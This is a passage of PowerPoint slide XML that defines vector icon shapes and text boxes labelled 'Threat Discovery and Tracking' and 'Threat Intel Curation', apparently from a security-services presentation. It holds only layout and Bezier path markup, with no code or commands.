                  <a:srgbClr val="003F7D"/>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7" name="Freeform 107"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7052446" y="3552105"/>
              <a:ext cx="366012" cy="354870"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1501 w 2158"/>
                <a:gd name="T1" fmla="*/ 1474 h 2089"/>
                <a:gd name="T2" fmla="*/ 1531 w 2158"/>
                <a:gd name="T3" fmla="*/ 1457 h 2089"/>
                <a:gd name="T4" fmla="*/ 1574 w 2158"/>
                <a:gd name="T5" fmla="*/ 1367 h 2089"/>
                <a:gd name="T6" fmla="*/ 1639 w 2158"/>
                <a:gd name="T7" fmla="*/ 1247 h 2089"/>
                <a:gd name="T8" fmla="*/ 1713 w 2158"/>
                <a:gd name="T9" fmla="*/ 1196 h 2089"/>
                <a:gd name="T10" fmla="*/ 1750 w 2158"/>
                <a:gd name="T11" fmla="*/ 1200 h 2089"/>
                <a:gd name="T12" fmla="*/ 1814 w 2158"/>
                <a:gd name="T13" fmla="*/ 1249 h 2089"/>
                <a:gd name="T14" fmla="*/ 1918 w 2158"/>
                <a:gd name="T15" fmla="*/ 1342 h 2089"/>
                <a:gd name="T16" fmla="*/ 2094 w 2158"/>
                <a:gd name="T17" fmla="*/ 1253 h 2089"/>
                <a:gd name="T18" fmla="*/ 1946 w 2158"/>
                <a:gd name="T19" fmla="*/ 949 h 2089"/>
                <a:gd name="T20" fmla="*/ 1837 w 2158"/>
                <a:gd name="T21" fmla="*/ 937 h 2089"/>
                <a:gd name="T22" fmla="*/ 1649 w 2158"/>
                <a:gd name="T23" fmla="*/ 1020 h 2089"/>
                <a:gd name="T24" fmla="*/ 1376 w 2158"/>
                <a:gd name="T25" fmla="*/ 1260 h 2089"/>
                <a:gd name="T26" fmla="*/ 1064 w 2158"/>
                <a:gd name="T27" fmla="*/ 1589 h 2089"/>
                <a:gd name="T28" fmla="*/ 801 w 2158"/>
                <a:gd name="T29" fmla="*/ 1848 h 2089"/>
                <a:gd name="T30" fmla="*/ 527 w 2158"/>
                <a:gd name="T31" fmla="*/ 2039 h 2089"/>
                <a:gd name="T32" fmla="*/ 332 w 2158"/>
                <a:gd name="T33" fmla="*/ 2088 h 2089"/>
                <a:gd name="T34" fmla="*/ 140 w 2158"/>
                <a:gd name="T35" fmla="*/ 1996 h 2089"/>
                <a:gd name="T36" fmla="*/ 38 w 2158"/>
                <a:gd name="T37" fmla="*/ 1781 h 2089"/>
                <a:gd name="T38" fmla="*/ 3 w 2158"/>
                <a:gd name="T39" fmla="*/ 1453 h 2089"/>
                <a:gd name="T40" fmla="*/ 19 w 2158"/>
                <a:gd name="T41" fmla="*/ 1223 h 2089"/>
                <a:gd name="T42" fmla="*/ 224 w 2158"/>
                <a:gd name="T43" fmla="*/ 560 h 2089"/>
                <a:gd name="T44" fmla="*/ 454 w 2158"/>
                <a:gd name="T45" fmla="*/ 232 h 2089"/>
                <a:gd name="T46" fmla="*/ 741 w 2158"/>
                <a:gd name="T47" fmla="*/ 42 h 2089"/>
                <a:gd name="T48" fmla="*/ 919 w 2158"/>
                <a:gd name="T49" fmla="*/ 3 h 2089"/>
                <a:gd name="T50" fmla="*/ 1063 w 2158"/>
                <a:gd name="T51" fmla="*/ 5 h 2089"/>
                <a:gd name="T52" fmla="*/ 1207 w 2158"/>
                <a:gd name="T53" fmla="*/ 60 h 2089"/>
                <a:gd name="T54" fmla="*/ 1412 w 2158"/>
                <a:gd name="T55" fmla="*/ 259 h 2089"/>
                <a:gd name="T56" fmla="*/ 1609 w 2158"/>
                <a:gd name="T57" fmla="*/ 644 h 2089"/>
                <a:gd name="T58" fmla="*/ 1630 w 2158"/>
                <a:gd name="T59" fmla="*/ 658 h 2089"/>
                <a:gd name="T60" fmla="*/ 1758 w 2158"/>
                <a:gd name="T61" fmla="*/ 653 h 2089"/>
                <a:gd name="T62" fmla="*/ 2028 w 2158"/>
                <a:gd name="T63" fmla="*/ 825 h 2089"/>
                <a:gd name="T64" fmla="*/ 2137 w 2158"/>
                <a:gd name="T65" fmla="*/ 1105 h 2089"/>
                <a:gd name="T66" fmla="*/ 2136 w 2158"/>
                <a:gd name="T67" fmla="*/ 1438 h 2089"/>
                <a:gd name="T68" fmla="*/ 2024 w 2158"/>
                <a:gd name="T69" fmla="*/ 1734 h 2089"/>
                <a:gd name="T70" fmla="*/ 1927 w 2158"/>
                <a:gd name="T71" fmla="*/ 1820 h 2089"/>
                <a:gd name="T72" fmla="*/ 1788 w 2158"/>
                <a:gd name="T73" fmla="*/ 1811 h 2089"/>
                <a:gd name="T74" fmla="*/ 1644 w 2158"/>
                <a:gd name="T75" fmla="*/ 1692 h 2089"/>
                <a:gd name="T76" fmla="*/ 1504 w 2158"/>
                <a:gd name="T77" fmla="*/ 1481 h 2089"/>
                <a:gd name="T78" fmla="*/ 1501 w 2158"/>
                <a:gd name="T79" fmla="*/ 1474 h 2089"/>
                <a:gd name="T80" fmla="*/ 265 w 2158"/>
                <a:gd name="T81" fmla="*/ 1060 h 2089"/>
                <a:gd name="T82" fmla="*/ 306 w 2158"/>
                <a:gd name="T83" fmla="*/ 1248 h 2089"/>
                <a:gd name="T84" fmla="*/ 411 w 2158"/>
                <a:gd name="T85" fmla="*/ 1333 h 2089"/>
                <a:gd name="T86" fmla="*/ 513 w 2158"/>
                <a:gd name="T87" fmla="*/ 1326 h 2089"/>
                <a:gd name="T88" fmla="*/ 656 w 2158"/>
                <a:gd name="T89" fmla="*/ 1252 h 2089"/>
                <a:gd name="T90" fmla="*/ 1245 w 2158"/>
                <a:gd name="T91" fmla="*/ 851 h 2089"/>
                <a:gd name="T92" fmla="*/ 1255 w 2158"/>
                <a:gd name="T93" fmla="*/ 823 h 2089"/>
                <a:gd name="T94" fmla="*/ 1123 w 2158"/>
                <a:gd name="T95" fmla="*/ 522 h 2089"/>
                <a:gd name="T96" fmla="*/ 946 w 2158"/>
                <a:gd name="T97" fmla="*/ 295 h 2089"/>
                <a:gd name="T98" fmla="*/ 778 w 2158"/>
                <a:gd name="T99" fmla="*/ 231 h 2089"/>
                <a:gd name="T100" fmla="*/ 638 w 2158"/>
                <a:gd name="T101" fmla="*/ 276 h 2089"/>
                <a:gd name="T102" fmla="*/ 452 w 2158"/>
                <a:gd name="T103" fmla="*/ 469 h 2089"/>
                <a:gd name="T104" fmla="*/ 308 w 2158"/>
                <a:gd name="T105" fmla="*/ 784 h 2089"/>
                <a:gd name="T106" fmla="*/ 265 w 2158"/>
                <a:gd name="T107" fmla="*/ 106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58" h="2089">
                  <a:moveTo>
                    <a:pt x="1501" y="1474"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1517" y="1478"/>
                    <a:pt x="1525" y="1468"/>
                    <a:pt x="1531" y="1457"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1546" y="1427"/>
                    <a:pt x="1558" y="1396"/>
                    <a:pt x="1574" y="1367"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1595" y="1326"/>
                    <a:pt x="1615" y="1285"/>
                    <a:pt x="1639" y="1247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1656" y="1220"/>
                    <a:pt x="1680" y="1200"/>
                    <a:pt x="1713" y="1196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1725" y="1194"/>
                    <a:pt x="1738" y="1196"/>
                    <a:pt x="1750" y="1200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1776" y="1210"/>
                    <a:pt x="1797" y="1225"/>
                    <a:pt x="1814" y="1249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1841" y="1288"/>
                    <a:pt x="1874" y="1322"/>
                    <a:pt x="1918" y="1342"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1996" y="1378"/>
                    <a:pt x="2074" y="1342"/>
                    <a:pt x="2094" y="1253"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2122" y="1137"/>
                    <a:pt x="2054" y="1001"/>
                    <a:pt x="1946" y="949"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1911" y="932"/>
                    <a:pt x="1875" y="931"/>
                    <a:pt x="1837" y="937"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1767" y="948"/>
                    <a:pt x="1706" y="981"/>
                    <a:pt x="1649" y="1020"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1548" y="1089"/>
                    <a:pt x="1460" y="1173"/>
                    <a:pt x="1376" y="1260"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1271" y="1369"/>
                    <a:pt x="1169" y="1481"/>
                    <a:pt x="1064" y="1589"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="978" y="1678"/>
                    <a:pt x="891" y="1765"/>
                    <a:pt x="801" y="1848"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="719" y="1925"/>
                    <a:pt x="629" y="1991"/>
                    <a:pt x="527" y="2039"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="465" y="2069"/>
                    <a:pt x="401" y="2089"/>
                    <a:pt x="332" y="2088"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="254" y="2087"/>
                    <a:pt x="191" y="2054"/>
                    <a:pt x="140" y="1996"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="1934"/>
                    <a:pt x="58" y="1859"/>
                    <a:pt x="38" y="1781"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="1673"/>
                    <a:pt x="0" y="1563"/>
                    <a:pt x="3" y="1453"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="1376"/>
                    <a:pt x="11" y="1299"/>
                    <a:pt x="19" y="1223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="989"/>
                    <a:pt x="119" y="769"/>
                    <a:pt x="224" y="560"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="440"/>
                    <a:pt x="359" y="328"/>
                    <a:pt x="454" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="536" y="149"/>
                    <a:pt x="630" y="82"/>
                    <a:pt x="741" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="798" y="21"/>
                    <a:pt x="857" y="5"/>
                    <a:pt x="919" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="967" y="2"/>
                    <a:pt x="1015" y="0"/>
                    <a:pt x="1063" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1115" y="11"/>
                    <a:pt x="1163" y="32"/>
                    <a:pt x="1207" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1290" y="111"/>
                    <a:pt x="1356" y="181"/>
                    <a:pt x="1412" y="259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1498" y="377"/>
                    <a:pt x="1560" y="507"/>
                    <a:pt x="1609" y="644"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1613" y="655"/>
                    <a:pt x="1618" y="659"/>
                    <a:pt x="1630" y="658"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1673" y="655"/>
                    <a:pt x="1716" y="649"/>
                    <a:pt x="1758" y="653"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1876" y="665"/>
                    <a:pt x="1964" y="728"/>
                    <a:pt x="2028" y="825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2085" y="910"/>
                    <a:pt x="2119" y="1004"/>
                    <a:pt x="2137" y="1105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2158" y="1216"/>
                    <a:pt x="2157" y="1327"/>
                    <a:pt x="2136" y="1438"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2116" y="1543"/>
                    <a:pt x="2082" y="1644"/>
                    <a:pt x="2024" y="1734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2000" y="1772"/>
                    <a:pt x="1969" y="1803"/>
                    <a:pt x="1927" y="1820"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1879" y="1840"/>
                    <a:pt x="1833" y="1833"/>
                    <a:pt x="1788" y="1811"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1731" y="1783"/>
                    <a:pt x="1686" y="1740"/>
                    <a:pt x="1644" y="1692"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1589" y="1627"/>
                    <a:pt x="1544" y="1556"/>
                    <a:pt x="1504" y="1481"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1503" y="1479"/>
                    <a:pt x="1502" y="1477"/>
                    <a:pt x="1501" y="1474"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="265" y="1060"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="1122"/>
                    <a:pt x="273" y="1188"/>
                    <a:pt x="306" y="1248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="1290"/>
                    <a:pt x="364" y="1320"/>
                    <a:pt x="411" y="1333"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="445" y="1342"/>
                    <a:pt x="479" y="1336"/>
                    <a:pt x="513" y="1326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="565" y="1310"/>
                    <a:pt x="611" y="1282"/>
                    <a:pt x="656" y="1252"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="852" y="1118"/>
                    <a:pt x="1048" y="984"/>
                    <a:pt x="1245" y="851"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1257" y="843"/>
                    <a:pt x="1259" y="836"/>
                    <a:pt x="1255" y="823"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1218" y="720"/>
                    <a:pt x="1176" y="618"/>
                    <a:pt x="1123" y="522"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1076" y="437"/>
                    <a:pt x="1022" y="357"/>
                    <a:pt x="946" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="897" y="255"/>
                    <a:pt x="842" y="230"/>
                    <a:pt x="778" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="727" y="233"/>
                    <a:pt x="681" y="249"/>
                    <a:pt x="638" y="276"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="559" y="325"/>
                    <a:pt x="501" y="394"/>
                    <a:pt x="452" y="469"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="567"/>
                    <a:pt x="341" y="672"/>
                    <a:pt x="308" y="784"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="873"/>
                    <a:pt x="266" y="963"/>
                    <a:pt x="265" y="10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7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1" noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="black">
            <a:xfrm>
              <a:off x="2228209" y="3574425"/>
              <a:ext cx="311494" cy="31023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 name="Freeform 14"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="833121" y="3563256"/>
              <a:ext cx="278242" cy="332568"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 46 w 210"/>
                <a:gd name="T1" fmla="*/ 183 h 251"/>
                <a:gd name="T2" fmla="*/ 46 w 210"/>
                <a:gd name="T3" fmla="*/ 61 h 251"/>
                <a:gd name="T4" fmla="*/ 135 w 210"/>
                <a:gd name="T5" fmla="*/ 38 h 251"/>
                <a:gd name="T6" fmla="*/ 135 w 210"/>
                <a:gd name="T7" fmla="*/ 219 h 251"/>
                <a:gd name="T8" fmla="*/ 0 w 210"/>
                <a:gd name="T9" fmla="*/ 201 h 251"/>
                <a:gd name="T10" fmla="*/ 135 w 210"/>
                <a:gd name="T11" fmla="*/ 251 h 251"/>
                <a:gd name="T12" fmla="*/ 210 w 210"/>
                <a:gd name="T13" fmla="*/ 231 h 251"/>
                <a:gd name="T14" fmla="*/ 210 w 210"/>
                <a:gd name="T15" fmla="*/ 20 h 251"/>
                <a:gd name="T16" fmla="*/ 135 w 210"/>
                <a:gd name="T17" fmla="*/ 0 h 251"/>
                <a:gd name="T18" fmla="*/ 0 w 210"/>
                <a:gd name="T19" fmla="*/ 50 h 251"/>
                <a:gd name="T20" fmla="*/ 0 w 210"/>
                <a:gd name="T21" fmla="*/ 201 h 251"/>
                <a:gd name="T22" fmla="*/ 46 w 210"/>
                <a:gd name="T23" fmla="*/ 18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251">
                  <a:moveTo>
                    <a:pt x="46" y="183"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="46" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210" y="231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210" y="20"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="50"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46" y="18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65" name="Group 64"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5561775" y="3559944"/>
              <a:ext cx="291492" cy="339190"/>
              <a:chOff x="4881563" y="3451225"/>
              <a:chExt cx="349250" cy="406400"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="55" name="Freeform 5"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="5023644" y="3630278"/>
                <a:ext cx="54779" cy="82864"/>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solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="30163"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18"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4881563" y="3451225"/>
                <a:ext cx="349250" cy="406400"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 70 w 96"/>
                  <a:gd name="T1" fmla="*/ 18 h 112"/>
                  <a:gd name="T2" fmla="*/ 52 w 96"/>
                  <a:gd name="T3" fmla="*/ 0 h 112"/>
                  <a:gd name="T4" fmla="*/ 44 w 96"/>
                  <a:gd name="T5" fmla="*/ 0 h 112"/>
                  <a:gd name="T6" fmla="*/ 26 w 96"/>
                  <a:gd name="T7" fmla="*/ 18 h 112"/>
                  <a:gd name="T8" fmla="*/ 8 w 96"/>
                  <a:gd name="T9" fmla="*/ 0 h 112"/>
                  <a:gd name="T10" fmla="*/ 0 w 96"/>
                  <a:gd name="T11" fmla="*/ 0 h 112"/>
                  <a:gd name="T12" fmla="*/ 0 w 96"/>
                  <a:gd name="T13" fmla="*/ 64 h 112"/>
                  <a:gd name="T14" fmla="*/ 48 w 96"/>
                  <a:gd name="T15" fmla="*/ 112 h 112"/>
                  <a:gd name="T16" fmla="*/ 96 w 96"/>
                  <a:gd name="T17" fmla="*/ 64 h 112"/>
                  <a:gd name="T18" fmla="*/ 96 w 96"/>
                  <a:gd name="T19" fmla="*/ 0 h 112"/>
                  <a:gd name="T20" fmla="*/ 88 w 96"/>
                  <a:gd name="T21" fmla="*/ 0 h 112"/>
                  <a:gd name="T22" fmla="*/ 70 w 96"/>
                  <a:gd name="T23" fmla="*/ 18 h 112"/>
                  <a:gd name="T24" fmla="*/ 88 w 96"/>
                  <a:gd name="T25" fmla="*/ 64 h 112"/>
                  <a:gd name="T26" fmla="*/ 48 w 96"/>
                  <a:gd name="T27" fmla="*/ 104 h 112"/>
                  <a:gd name="T28" fmla="*/ 8 w 96"/>
                  <a:gd name="T29" fmla="*/ 64 h 112"/>
                  <a:gd name="T30" fmla="*/ 8 w 96"/>
                  <a:gd name="T31" fmla="*/ 19 h 112"/>
                  <a:gd name="T32" fmla="*/ 26 w 96"/>
                  <a:gd name="T33" fmla="*/ 26 h 112"/>
                  <a:gd name="T34" fmla="*/ 48 w 96"/>
                  <a:gd name="T35" fmla="*/ 14 h 112"/>
                  <a:gd name="T36" fmla="*/ 70 w 96"/>
                  <a:gd name="T37" fmla="*/ 26 h 112"/>
                  <a:gd name="T38" fmla="*/ 88 w 96"/>
                  <a:gd name="T39" fmla="*/ 19 h 112"/>
                  <a:gd name="T40" fmla="*/ 88 w 96"/>
                  <a:gd name="T41"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0" y="18"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="18"/>
                      <a:pt x="52" y="10"/>
                      <a:pt x="52" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="0"/>
                      <a:pt x="44" y="0"/>
                      <a:pt x="44" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="10"/>
                      <a:pt x="36" y="18"/>
                      <a:pt x="26" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="18"/>
                      <a:pt x="8" y="10"/>
                      <a:pt x="8" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="64"/>
                      <a:pt x="0" y="64"/>
                      <a:pt x="0" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="90"/>
                      <a:pt x="22" y="112"/>
                      <a:pt x="48" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="112"/>
                      <a:pt x="96" y="90"/>
                      <a:pt x="96" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="0"/>
                      <a:pt x="96" y="0"/>
                      <a:pt x="96" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="0"/>
                      <a:pt x="88" y="0"/>
                      <a:pt x="88" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="10"/>
                      <a:pt x="80" y="18"/>
                      <a:pt x="70" y="18"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="88" y="64"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="86"/>
                      <a:pt x="70" y="104"/>
                      <a:pt x="48" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="104"/>
                      <a:pt x="8" y="86"/>
                      <a:pt x="8" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="19"/>
                      <a:pt x="8" y="19"/>
                      <a:pt x="8" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="23"/>
                      <a:pt x="19" y="26"/>
                      <a:pt x="26" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="26"/>
                      <a:pt x="43" y="21"/>
                      <a:pt x="48" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="21"/>
                      <a:pt x="61" y="26"/>
                      <a:pt x="70" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="26"/>
                      <a:pt x="83" y="23"/>
                      <a:pt x="88" y="19"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="88" y="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7" name="Rectangle 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="9139290" y="1286087"/>
              <a:ext cx="3022547" cy="1115568"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:alpha val="69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TextBox 67"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9166238" y="1821672"/>
              <a:ext cx="1640514" cy="586314"/>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THREAT DISCOVERY </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AND TRACKING</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name="TextBox 68"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10907079" y="1821672"/>
              <a:ext cx="1244572" cy="586314"/>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THREAT INTEL</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CURATION</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="86" name="Group 85"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9683098" y="1467134"/>
              <a:ext cx="606796" cy="402078"/>
              <a:chOff x="9336455" y="1360625"/>
              <a:chExt cx="727029" cy="481745"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="85" name="Oval 84"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="9621543" y="1382145"/>
                <a:ext cx="423506" cy="423506"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="0059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Freeform 80"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="9603109" y="1360625"/>
                <a:ext cx="460375" cy="46037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89 w 128"/>
                  <a:gd name="T13" fmla="*/ 40 h 128"/>
                  <a:gd name="T14" fmla="*/ 79 w 128"/>
                  <a:gd name="T15" fmla="*/ 10 h 128"/>
                  <a:gd name="T16" fmla="*/ 115 w 128"/>
                  <a:gd name="T17" fmla="*/ 40 h 128"/>
                  <a:gd name="T18" fmla="*/ 120 w 128"/>
                  <a:gd name="T19" fmla="*/ 64 h 128"/>
                  <a:gd name="T20" fmla="*/ 118 w 128"/>
                  <a:gd name="T21" fmla="*/ 80 h 128"/>
                  <a:gd name="T22" fmla="*/ 90 w 128"/>
                  <a:gd name="T23" fmla="*/ 80 h 128"/>
                  <a:gd name="T24" fmla="*/ 91 w 128"/>
                  <a:gd name="T25" fmla="*/ 64 h 128"/>
                  <a:gd name="T26" fmla="*/ 90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2 w 128"/>
                  <a:gd name="T47" fmla="*/ 48 h 128"/>
                  <a:gd name="T48" fmla="*/ 83 w 128"/>
                  <a:gd name="T49" fmla="*/ 64 h 128"/>
                  <a:gd name="T50" fmla="*/ 82 w 128"/>
                  <a:gd name="T51" fmla="*/ 80 h 128"/>
                  <a:gd name="T52" fmla="*/ 46 w 128"/>
                  <a:gd name="T53" fmla="*/ 80 h 128"/>
                  <a:gd name="T54" fmla="*/ 8 w 128"/>
                  <a:gd name="T55" fmla="*/ 64 h 128"/>
                  <a:gd name="T56" fmla="*/ 10 w 128"/>
                  <a:gd name="T57" fmla="*/ 48 h 128"/>
                  <a:gd name="T58" fmla="*/ 38 w 128"/>
                  <a:gd name="T59" fmla="*/ 48 h 128"/>
                  <a:gd name="T60" fmla="*/ 37 w 128"/>
                  <a:gd name="T61" fmla="*/ 64 h 128"/>
                  <a:gd name="T62" fmla="*/ 38 w 128"/>
                  <a:gd name="T63" fmla="*/ 80 h 128"/>
                  <a:gd name="T64" fmla="*/ 10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0 h 128"/>
                  <a:gd name="T78" fmla="*/ 39 w 128"/>
                  <a:gd name="T79" fmla="*/ 40 h 128"/>
                  <a:gd name="T80" fmla="*/ 13 w 128"/>
                  <a:gd name="T81" fmla="*/ 40 h 128"/>
                  <a:gd name="T82" fmla="*/ 49 w 128"/>
